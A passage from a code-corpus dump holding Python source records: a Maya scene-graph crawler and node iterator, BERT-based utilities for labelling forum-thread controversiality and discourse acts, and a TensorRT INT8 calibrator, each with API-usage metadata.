else:\n cb_logger.debug('{} has already been removed', api_node)\n\n def api_node_path(self, split_path):\n \"\"\"given a list of names representing a hierarchy, return the\n api_node representations of those names\"\"\"\n lookups = self._left_fold(split_path)\n nodes = []\n for lookup in lookups:\n branch = self.branch(lookup)\n nodes.append(branch[self.key_type])\n return nodes\n\n # ------------------------------------------------------ Helpers -- #\n @staticmethod\n def _left_fold(split_path):\n \"\"\"fold the given path left:\n >> _left_fold([a, b, c])\n >> [a], [a, b], [a, b, c]\n \"\"\"\n return [split_path[0:i + 1] for i in range(len(split_path))]\n\n def _recurse_key_to_key(self, top_dict, sub_dict):\n for key, mixed_dict in sub_dict.items():\n node = mixed_dict.pop(self.key_type)\n top_dict[node] = {}\n self._recurse_key_to_key(top_dict[node], mixed_dict)\n return top_dict\n\n def key_dict(self):\n \"\"\"flatten a nested dictionary by key values\"\"\"\n new_dict = {}\n return self._recurse_key_to_key(new_dict, self.tree)\n\n\nclass LiveDagCrawler(DagCrawler):\n \"\"\"The \"live\" version of the DagCrawler registers its own set of callbacks\n to keep itself up to date when the DAG model changes in Maya. This class\n is meant to be pretty hands-off, so the only \"public\" function is \"freeze\",\n which kills all the callbacks\"\"\"\n\n def __init__(self, scene_watcher=None, *args, **kwargs):\n super(LiveDagCrawler, self).__init__(*args, **kwargs)\n self.populate()\n self._watcher = scene_watcher if scene_watcher else SceneWatcher()\n self.update_callbacks = []\n self._add_hooks()\n\n def _updated(self):\n for callback in self.update_callbacks:\n callback()\n\n def _add_hooks(self):\n logger.debug('initializing callbacks for LiveDagCrawler')\n self._watcher.hook('any_node_added',\n node_type='dagNode').append(self._node_added)\n self._watcher.hook('any_node_removed',\n node_type='dagNode').append(self._node_removed)\n self._watcher.hook('any_child_added').append(self._child_added)\n self._watcher.hook('any_name_changed').append(self._node_renamed)\n\n def _node_added(self, api_node, _):\n cb_logger.debug(\"callback triggered - node added: {}\", api_node)\n cb_logger.debug(\"adding node to tree...\")\n self.add_node(api_node)\n\n def _node_removed(self, api_node, _):\n cb_logger.debug(\"callback triggered - node removed: {}\", api_node)\n cb_logger.debug(\"removing node from tree...\")\n self.remove_node(api_node)\n\n def _child_added(self, child, *_):\n if child.is_valid:\n cb_logger.debug(\"callback triggered - child added: {}\", child)\n cb_logger.debug(\"re-pathing node tree...\")\n old_path = self._api_node_to_path(child, use_cache=True)\n new_path = self._api_node_to_path(child, use_cache=False)\n self.repath(child, old_path, new_path, repath_descendants=True)\n\n def _node_renamed(self, api_node, old_name, _):\n if api_node in self.path_dict:\n cb_logger.debug(\"callback triggered - node renamed: {}\", api_node)\n cb_logger.debug(\"re-pathing node tree...\")\n new_path = self._api_node_to_path(api_node)\n old_path = new_path[:-1] + [old_name]\n self.repath(api_node, old_path, new_path, repath_descendants=True)\n\n def freeze(self):\n self._watcher.flush()\n\n def __del__(self):\n try:\n self._watcher.flush()\n except:\n raise\n\n# -------------------------------------------------------------------------- #\n# -------------------------------------------------------------------- LS -- #\nclass dg_iter(object):\n \"\"\"class for iterating over nodes, either in the Dependency Graph or\n the DAG. Performance is close to cmds.ls, and exceeds it in certain\n custom plugin-type lookups. \"\"\"\n\n # defines the kinds of iteration possible with the class\n iterators = {'depend': (om.MItDependencyNodes, 'thisNode'),\n 'dag': (om.MItDag, 'currentItem')}\n\n def __init__(self, iterator_type='depend',\n plugin_types=[om.MFn.kPluginDependNode],\n maya_types=None):\n # if no maya type filters are provided, just get all dependency nodes\n maya_types = maya_types or ['dependencyNode']\n self.it, self._get_method = dg_iter.iterators[iterator_type]\n self.plugin_search = plugin_types[0]\n self.filter, self.plugin_types = self._build_filter(maya_types)\n\n def walk(self, it):\n \"\"\"do the work of moving through maya's provided iterator classes\"\"\"\n\n # determine interface beforehand. in large scenes, removing\n # the dot increases execution speed by up to 20%\n done = it.isDone\n\n # MItDag and MItDependNodes have two different methods for getting the\n # current node, thisNode and currentItem. We use getattr to grab the\n # correct method\n current_item = getattr(it, self._get_method)\n advance_item = it.next\n # get all objects in the main loop\n while not done():\n n = current_item()\n yield n\n advance_item()\n raise StopIteration\n\n def iterate(self):\n \"\"\"generator for dependency nodes\"\"\"\n # determine iterator type\n main_it = self.it(self.filter)\n # walk through two iterators, one set to the maya type filters,\n # and another for types associated with plugins\n for n in self.walk(main_it):\n yield n\n filters = self.plugin_types\n if filters:\n plugin_it = self.it(self._to_filter(self.plugin_search))\n for n in self.walk(plugin_it):\n if api.type_of(n) in filters:\n yield n\n\n def to_api_nodes(self):\n for obj in self.iterate():\n yield api.ApiNode(obj)\n raise StopIteration\n\n def to_msel(self):\n return api.msel_from_iter(self.iterate())\n\n def to_strings(self):\n return api.msel_to_strings(self.to_msel())\n\n def _build_filter(self, filters):\n it_filter = om.MIteratorType()\n types = om.MIntArray()\n _filters = list(filters)\n for filter_ in list(_filters):\n\n enumerated = api.fn_type_string_to_int(filter_)\n if enumerated:\n types.append(enumerated)\n _filters.remove(filter_)\n else:\n pass\n it_filter.setFilterList(types)\n return (it_filter, _filters)\n\n def _to_filter(self, enumerated):\n it_filter = om.MIteratorType()\n types = om.MIntArray()\n types.append(enumerated)\n it_filter.setFilterList(types)\n return it_filter\n\n def __iter__(self):\n return self.iterate()\n\n# selection helpers\n# TODO: this is weird, and needs to be moved\n\ndef selection():\n sel_list = om.MSelectionList()\n om.MGlobal.getActiveSelectionList(sel_list)\n return sel_list\n\ndef selection_iter():\n return iterate_msel_list(selection())\n\n# mselectionlist helpers\n# TODO: move this somewhere better\n\ndef iterate_msel_list(sel_list):\n iterator = om.MItSelectionList(sel_list)\n while not iterator.isDone():\n obj = om.MObject()\n iterator.getDependNode(obj)\n yield obj\n iterator.next()\n", "sub_path": "mirage/dg_utils.py", "file_name": "dg_utils.py", "file_ext": "py", "file_size_in_byte": 13807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "vfx_utils.omni.data_types.TreeNode", "line_number": 30, "usage_type": "call"}, {"api_name": "vfx_utils.omni.slog.Logger", "line_number": 32, "usage_type": "call"}, {"api_name": "vfx_utils.omni.slog", "line_number": 32, "usage_type": "name"}, {"api_name": "vfx_utils.omni.slog.Logger", "line_number": 35, "usage_type": "call"}, {"api_name": "vfx_utils.omni.slog", "line_number": 35, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MItDag", "line_number": 42, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 42, "usage_type": "name"}, {"api_name": "vfx_utils.omni.data_types.TreeDict", "line_number": 59, "usage_type": "call"}, {"api_name": "vfx_utils.omni.data_types.TreeDict", "line_number": 66, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 71, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils.msplit", "line_number": 119, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils.msplit", "line_number": 140, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils.msplit", "line_number": 142, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.maya_callbacks.watchers.SceneWatcher", "line_number": 207, "usage_type": "call"}, {"api_name": "maya.OpenMaya.MItDependencyNodes", "line_number": 267, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 267, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MItDag", "line_number": 268, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 268, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MFn", "line_number": 271, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 271, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.type_of", "line_number": 310, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 310, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.ApiNode", "line_number": 315, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 315, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.msel_from_iter", "line_number": 319, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 319, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.msel_to_strings", "line_number": 322, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 322, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIteratorType", "line_number": 325, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 325, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIntArray", "line_number": 326, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 326, "usage_type": "name"}, {"api_name": "vfx_utils.mirage.api_utils.fn_type_string_to_int", "line_number": 330, "usage_type": "call"}, {"api_name": "vfx_utils.mirage.api_utils", "line_number": 330, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIteratorType", "line_number": 340, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 340, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MIntArray", "line_number": 341, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 341, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MSelectionList", "line_number": 353, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 353, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MGlobal.getActiveSelectionList", "line_number": 354, "usage_type": "call"}, {"api_name": "maya.OpenMaya.MGlobal", "line_number": 354, "usage_type": "attribute"}, {"api_name": "maya.OpenMaya", "line_number": 354, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MItSelectionList", "line_number": 364, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 364, "usage_type": "name"}, {"api_name": "maya.OpenMaya.MObject", "line_number": 366, "usage_type": "call"}, {"api_name": "maya.OpenMaya", "line_number": 366, "usage_type": "name"}]} +{"seq_id": "129672453", "text": "import tqdm\nimport numpy as np\nimport pandas as pd\n\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer \nfrom transformers import BertTokenizer\nfrom scipy.special import softmax\nimport torch\nimport pickle\n\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom transformers import BertForSequenceClassification, AdamW, BertConfig\nfrom transformers import get_linear_schedule_with_warmup\n\nfrom sklearn.model_selection import train_test_split\n\n\nwith open('models/discourse_model.pickle', 'rb') as f:\n model = pickle.load(f)\n\nmodel.eval()\n\nimport pickle\n\nimport torch\n\n# If there's a GPU available...\nif torch.cuda.is_available(): \n # Tell PyTorch to use the GPU. \n device = torch.device(\"cuda\")\n print('There are %d GPU(s) available.' % torch.cuda.device_count())\n print('We will use the GPU:', torch.cuda.get_device_name(0))\n\n# If not...\nelse:\n print('No GPU available, using the CPU instead.')\n device = torch.device(\"cpu\")\n\n\ntqdm.tqdm.pandas()\n\nlemmatizer = WordNetLemmatizer() \n\ndef flatten_thread_r(thread_id, comments):\n extracted_comments = []\n if len(comments) == 0:\n return extracted_comments\n else:\n \n for comment in comments:\n comment_dict = {\n 'id': comment['id'],\n 'parent_id': comment['parent_id'] or thread_id,\n 'controversiality': comment['controversiality'],\n 'body': comment['body'],\n 'created_utc': comment['created_utc'],\n 'author': comment['author']\n }\n \n extracted_comments += [comment_dict] + flatten_thread_r(thread_id, comment['children'])\n \n return extracted_comments\n\ndef flatten_thread(thread):\n flattened_comments = flatten_thread_r(thread['id'], thread['children'])\n return flattened_comments\n\ndef label(threads):\n def percent_upvoted(x):\n if x.ups + x.downs == 0:\n return 0\n return x.ups / (x.ups + x.downs)\n\n\n threads['percent_upvoted'] = threads.apply(percent_upvoted, axis=1)\n bottom_quartile = np.percentile(threads.percent_upvoted.values, 25)\n top_quartile = np.percentile(threads.percent_upvoted.values, 75)\n\n print('Bottom quartile: ', bottom_quartile)\n print('Top quartile: ', top_quartile)\n\n def controversiality(x):\n if x <= bottom_quartile:\n return int(True)\n elif x >= top_quartile:\n return int(False)\n else:\n return -1\n\n threads['label'] = threads.percent_upvoted.apply(controversiality)\n threads = threads[threads.label != -1]\n\n return threads\n\n\ndef prep_data(threads):\n threads = label(threads)\n threads['comments'] = threads.progress_apply(flatten_thread, axis=1)\n\n return threads\n\ndef get_corpus(threads):\n corpus = []\n \n def _get_corpus(thread):\n corpus.append(' '.join([lemmatizer.lemmatize(word.lower()) for word in word_tokenize(thread.selftext)]))\n for comment in thread.comments:\n corpus.append(' '.join([lemmatizer.lemmatize(word.lower()) for word in word_tokenize(comment['body'])]))\n \n threads.progress_apply(_get_corpus, axis=1)\n \n return corpus\n\ndef get_ids(threads):\n ids = {}\n def _get_ids(thread):\n ids[thread.id] = [comment['id'] for comment in thread.comments]\n\n threads.progress_apply(_get_ids, axis=1)\n\n return ids\n\ndef _text_to_bert(threads):\n def tokenize_fn(x):\n tokenized = ['[CLS]'] + bert_tokenizer.tokenize(x)[:510] + ['[SEP]']\n \n if len(tokenized) < 512:\n tokenized += ['[PAD]'] * (512 - len(tokenized))\n tokenized = bert_tokenizer.convert_tokens_to_ids(tokenized)\n return tokenized\n \n def tokenize_comments(x):\n return [tokenize_fn(comment['body']) for comment in x]\n \n \n title_body = threads.title + ' ' + threads.selftext\n title_body = title_body.apply(tokenize_fn)\n comments = df.comments.progress_apply(tokenize_comments)\n \n return (title_body, comments)\n\ndef _create_tb_mask(x):\n return [token_id > 0 for token_id in x]\n\ndef _create_comment_mask(x):\n c = []\n for comment in x:\n c.append([token_id > 0 for token_id in comment])\n return torch.LongTensor(np.stack(c)) if len(c) > 0 else torch.LongTensor([[0] * 512])\n\n\ndef get_discourse_acts(threads):\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n with open('discourse_model.pickle', 'rb') as f:\n discourse_model = pickle.load(f)\n\n title_body, comments = _text_to_bert(threads)\n title_body_mask = title_body.apply(_create_tb_mask)\n comment_mask = comments.apply(_create_comment_mask)\n\n title_body_tensor = torch.LongTensor(np.stack(title_body.values))\n title_body_mask = torch.LongTensor(np.stack(title_body_mask.values))\n\n comment_tensor = comments.progress_apply(lambda x: torch.LongTensor(np.stack(x)) if len(x) > 0 else torch.LongTensor(np.stack([[0] * 512])))\n comment_mask = torch.LongTensor(np.stack(comment_mask.values))\n\ndef _find_post(id, comments):\n for comment in comments:\n if comment['id'] == id:\n return comment\n return None\n\ndef _create_bigrams(thread):\n bigrams = []\n for comment in thread.comments:\n parent = _find_post(comment['parent_id'], thread.comments)\n if parent is None:\n bigrams.append((thread.discourse_act, comment['discourse_act']))\n else:\n bigrams.append((parent['discourse_act'], comment['discourse_act']))\n \n return bigrams\n\ndef create_bigrams(threads):\n threads['bigrams'] = threads.apply(_create_bigrams, axis=1)\n\ndef logits_to_act(logits):\n return np.argmax(softmax(logits, axis=-1), axis=-1)\n\n\ndef assign_acts(tb_acts, c_acts, threads):\n acts = logits_to_act(np.stack(tb_acts))\n threads['discourse_act'] = acts\n i = 0\n for idx, row in tqdm.tqdm(threads.iterrows(), total=len(threads)):\n cs = logits_to_act(c_acts[i])\n new_comments = []\n for c, c_act in zip(row.comments, cs):\n c['discourse_act'] = c_act\n new_comments.append(c)\n i += 1\n assert all(['discourse_act' in c.keys() for c in new_comments]), 'Not every comment got an act!' \n row.comments = new_comments\n\ndef text_to_discourse_acts(threads):\n print(\"Vectorizing threads...\")\n title_body_tensor, title_body_mask, comment_tensor, comment_mask = get_tensors(threads)\n print(\"Running BERT\")\n tb_acts, c_acts = get_discourse_acts(title_body_tensor, title_body_mask, comment_tensor, comment_mask)\n print(\"Assigning acts...\")\n assign_acts(tb_acts, c_acts, threads)\n print('Done.')\n\ndef get_discourse_acts(title_body_tensor, title_body_mask, comment_tensor, comment_mask):\n tb_acts = []\n c_acts = []\n for tbt, tbm, ct, cm in tqdm.tqdm(zip(title_body_tensor, title_body_mask, comment_tensor, comment_mask), total=len(title_body_tensor)):\n with torch.no_grad():\n dataset = TensorDataset(ct, cm)\n loader = DataLoader(dataset, batch_size=3)\n \n tbt = tbt.to(device)\n tbm = tbm.to(device)\n \n tb_act = model(tbt.view((1, -1)), attention_mask = tbm.view((1, -1)))[0].cpu().numpy()\n tb_acts.append(tb_act[0])\n \n cs = []\n for batch in loader:\n ct, cm = batch\n ct = ct.to(device)\n cm = cm.to(device)\n \n c_act = model(ct, cm)[0].cpu().numpy()\n for c in c_act:\n cs.append(c)\n cs = np.stack(cs)\n c_acts.append(cs)\n \n return tb_acts, c_acts\n\nbert_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\ndef _text_to_bert(threads):\n def tokenize_fn(x):\n tokenized = ['[CLS]'] + bert_tokenizer.tokenize(x)[:510] + ['[SEP]']\n \n if len(tokenized) < 512:\n tokenized += ['[PAD]'] * (512 - len(tokenized))\n tokenized = bert_tokenizer.convert_tokens_to_ids(tokenized)\n return tokenized\n \n def tokenize_comments(x):\n return [tokenize_fn(comment['body']) for comment in x]\n \n \n title_body = threads.title + ' ' + threads.selftext\n title_body = title_body.apply(tokenize_fn)\n comments = threads.comments.progress_apply(tokenize_comments)\n \n return (title_body, comments)\n\ndef _create_tb_mask(x):\n return [int(token_id > 0) for token_id in x]\n\ndef _create_comment_mask(x):\n c = []\n for comment in x:\n c.append([int(token_id > 0) for token_id in comment])\n return torch.LongTensor(np.stack(c)) if len(c) > 0 else torch.LongTensor([[0] * 512])\n\n\ndef get_tensors(threads):\n title_body, comments = _text_to_bert(threads)\n title_body_mask = title_body.apply(_create_tb_mask)\n comment_mask = comments.apply(_create_comment_mask)\n\n title_body_tensor = torch.LongTensor(np.stack(title_body.values))\n title_body_mask = torch.LongTensor(np.stack(title_body_mask.values))\n\n comment_tensor = comments.progress_apply(lambda x: torch.LongTensor(np.stack(x)) if len(x) > 0 else torch.LongTensor(np.stack([[0] * 512])))\n comment_tensor = comment_tensor.values\n comment_mask = comment_mask.values\n \n return title_body_tensor, title_body_mask, comment_tensor, comment_mask\n\ndef _flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\nimport time\nimport datetime\n\ndef _format_time(elapsed):\n '''\n Takes a time in seconds and returns a string hh:mm:ss\n '''\n # Round to the nearest second.\n elapsed_rounded = int(round((elapsed)))\n \n # Format as hh:mm:ss\n return str(datetime.timedelta(seconds=elapsed_rounded))\n\ndef finetune_bert(title_body_tensor, title_body_mask, threads):\n labels = torch.LongTensor(np.stack(threads.label.values))\n print(labels.size())\n train_tbt, test_tbt, train_tbm, test_tbm, train_labels, test_labels = train_test_split(\n title_body_tensor, title_body_mask, labels,\n test_size=0.2, random_state=42\n )\n \n training_stats = []\n \n train_dataset = TensorDataset(train_tbt, train_tbm, train_labels)\n test_dataset = TensorDataset(test_tbt, test_tbm, test_labels)\n train_dataloader = DataLoader(train_dataset, batch_size=2)\n test_dataloader = DataLoader(test_dataset, batch_size=2)\n \n epochs = 4\n total_steps = len(train_dataloader) * epochs\n \n model = BertForSequenceClassification.from_pretrained(\n 'bert-base-uncased',\n num_labels=2,\n output_attentions=False,\n output_hidden_states=True\n )\n \n model.cuda() \n optimizer = AdamW(model.parameters(),\n lr=2e-5,\n eps=1e-8)\n scheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = 0, # Default value in run_glue.py\n num_training_steps = total_steps)\n total_steps = len(train_dataloader) * epochs\n total_t0 = time.time()\n for epoch_i in range(0, epochs):\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n model.train()\n \n t0 = time.time()\n total_train_loss = 0\n \n for step, batch in enumerate(train_dataloader):\n b_input_ids = batch[0].to(device)\n b_input_mask = batch[1].to(device)\n b_labels = batch[2].to(device)\n \n model.zero_grad()\n \n loss, logits, _ = model(b_input_ids,\n token_type_ids=None,\n attention_mask=b_input_mask,\n labels=b_labels)\n \n total_train_loss += loss.item()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n optimizer.step()\n scheduler.step()\n \n avg_train_loss = total_train_loss / len(train_dataloader)\n training_time = _format_time(time.time() - t0)\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epcoh took: {:}\".format(training_time))\n \n print(\"\")\n print(\"Running Validation...\")\n t0 = time.time()\n \n model.eval()\n \n total_eval_accuracy = 0\n total_eval_loss = 0\n nb_eval_steps = 0\n \n for batch in test_dataloader:\n b_input_ids = batch[0].to(device)\n b_input_mask = batch[1].to(device)\n b_labels = batch[2].to(device)\n \n with torch.no_grad(): \n loss, logits, _ = model(b_input_ids,\n token_type_ids=None,\n attention_mask=b_input_mask,\n labels=b_labels)\n \n total_eval_loss += loss.item()\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.cpu().numpy()\n \n total_eval_accuracy += _flat_accuracy(logits, label_ids)\n \n avg_val_accuracy = total_eval_accuracy / len(test_dataloader)\n print(\" Accuracy: {0:.2f}\".format(avg_val_accuracy))\n \n avg_val_loss = total_eval_loss / len(test_dataloader)\n validation_time = _format_time(time.time() - t0)\n \n print(\" Validation Loss: {0:.2f}\".format(avg_val_loss))\n print(\" Validation took: {:}\".format(validation_time))\n\n # Record all statistics from this epoch.\n training_stats.append(\n {\n 'epoch': epoch_i + 1,\n 'Training Loss': avg_train_loss,\n 'Valid. Loss': avg_val_loss,\n 'Valid. Accur.': avg_val_accuracy,\n 'Training Time': training_time,\n 'Validation Time': validation_time\n }\n )\n\n print(\"\")\n print(\"Training complete!\")\n\n print(\"Total training took {:} (h:mm:ss)\".format(_format_time(time.time()-total_t0)))\n return model.cpu(), training_stats", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 14206, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pickle.load", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.cuda.get_device_name", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 38, "usage_type": "call"}, {"api_name": "tqdm.tqdm.pandas", "line_number": 41, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 41, "usage_type": "attribute"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 78, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 107, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 150, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer.from_pretrained", "line_number": 154, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer", "line_number": 154, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 189, "usage_type": "call"}, {"api_name": "scipy.special.softmax", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 193, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 196, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 219, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 238, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer.from_pretrained", "line_number": 243, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer", "line_number": 243, "usage_type": "name"}, {"api_name": "torch.LongTensor", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 279, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 290, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 303, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 306, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 308, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 315, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 318, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification.from_pretrained", "line_number": 323, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification", "line_number": 323, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 331, "usage_type": "call"}, {"api_name": "transformers.get_linear_schedule_with_warmup", "line_number": 334, "usage_type": "call"}, {"api_name": "time.time", "line_number": 338, "usage_type": "call"}, {"api_name": "time.time", "line_number": 345, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 362, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 362, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 367, "usage_type": "call"}, {"api_name": "time.time", "line_number": 374, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 387, "usage_type": "call"}, {"api_name": "time.time", "line_number": 403, "usage_type": "call"}, {"api_name": "time.time", "line_number": 423, "usage_type": "call"}]} +{"seq_id": "407784829", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\n\nimport pycuda.autoinit # noqa\nimport pycuda.driver as cuda\n\n\nclass _CalibratorBuffer:\n\n def __init__(self, bindings, batch_size):\n self.bindings = bindings\n self.allocations = {}\n for binding in self.bindings.values():\n elem_size = binding.type.size\n elem_count = binding.dimensions.size\n self.allocations[binding.name] = \\\n cuda.mem_alloc(batch_size * elem_size * elem_count)\n\n def release(self):\n for mem in self.allocations.values():\n mem.free()\n self.allocations = {}\n\n def put(self, name, index, value):\n binding = self.bindings[name]\n if value.dtype != binding.type.nptype:\n raise TypeError()\n if value.shape != binding.dimensions.shape:\n raise ValueError()\n allocation = self.allocations[name]\n elem_size = binding.type.size\n elem_count = binding.dimensions.size\n dstptr = int(allocation) + index * elem_size * elem_count\n if value.flags[\"C_CONTIGUOUS\"]:\n cuda.memcpy_htod(dstptr, value)\n else:\n cuda.memcpy_htod(dstptr, np.ascontiguousarray(value))\n\n\nclass Int8Calibrator:\n \"\"\"The object to use INT8 calibrator.\n\n Args:\n samples(object): The samples for INT8 calibrator.\n batch_size(int): The batch size.\n\n \"\"\"\n\n def __init__(self, samples, batch_size):\n self.batch_size = batch_size\n self.iterator = iter(samples)\n self.network = None\n self.buffer = None\n\n def get_batch(self, names):\n \"\"\"Get the batch of input for calibration.\n\n Args:\n names(list): The names of the network input.\n\n Returns:\n batch(list): The batch of input for calibration.\n\n \"\"\"\n assert self.network is not None\n if self.buffer is not None:\n self.buffer.release()\n self.buffer = None\n self.buffer = _CalibratorBuffer(\n self.network.input_bindings, self.batch_size)\n for i in range(self.batch_size):\n try:\n sample = next(self.iterator)\n except StopIteration:\n self.buffer.release()\n self.buffer = None\n return None\n if type(sample) is not dict:\n if len(names) == 1:\n sample = {names[0]: sample}\n else:\n raise ValueError()\n for key in names:\n self.buffer.put(key, i, sample[key])\n return [self.buffer.allocations[key] for key in names]\n\n def get_batch_size(self):\n \"\"\"Get the batch size.\n\n Returns:\n batch_size(int): The batch size.\n \"\"\"\n return self.batch_size\n", "sub_path": "turret/int8/int8_calibrator.py", "file_name": "int8_calibrator.py", "file_ext": "py", "file_size_in_byte": 2803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pycuda.driver.mem_alloc", "line_number": 17, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 17, "usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_htod", "line_number": 35, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 35, "usage_type": "name"}, {"api_name": "pycuda.driver.memcpy_htod", "line_number": 37, "usage_type": "call"}, {"api_name": "pycuda.driver", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.ascontiguousarray", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "267409389", "text": "import discord\nimport 